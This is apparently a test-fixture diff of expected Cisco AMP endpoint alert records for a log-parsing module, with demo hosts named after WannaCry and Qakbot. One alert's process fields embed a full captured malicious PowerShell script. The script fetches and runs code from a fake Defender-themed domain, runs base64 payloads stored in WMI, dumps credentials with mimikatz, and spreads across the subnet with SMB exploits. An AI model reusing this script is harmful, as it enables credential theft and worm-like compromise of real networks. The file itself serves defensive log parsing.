"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 765000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25559, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": 
"test_connector_guid", + "cisco.amp.detection_id": "6412622782676336648", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 29323, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336647", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + 
"malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 30524, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336646", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 713000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 31725, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + 
"Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336645", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 198000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "120C.tmp", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 35438, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": 
"2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412622782676336644", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "2f99e3456dc1d26f77c52b2119fde92f", + "file.hash.sha1": "92673dd0e5f4a094fa6cd57bb301f884f2289f6c", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 36775, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "2f99e3456dc1d26f77c52b2119fde92f", + "92673dd0e5f4a094fa6cd57bb301f884f2289f6c" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:14:44.000Z", + "cisco.amp.bp_data.audit": false, + "cisco.amp.bp_data.details.actions": [ + { + "action": "end_process", + "end_ts": 1602033881808, + "params": [ 
+ "10724" + ], + "start_ts": 1602033881805, + "status": "success" + } + ], + "cisco.amp.bp_data.details.eng_epoch": 1, + "cisco.amp.bp_data.details.eng_ver": "0.9.0.104", + "cisco.amp.bp_data.details.matched_activity.events": [ + { + "process:start": { + "app": "powershell.exe", + "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "args": [ + "powershell.exe", + "-NoP", + "-NonI", + "-W", + "Hidden", + "-E", + "$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) " + ], + "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
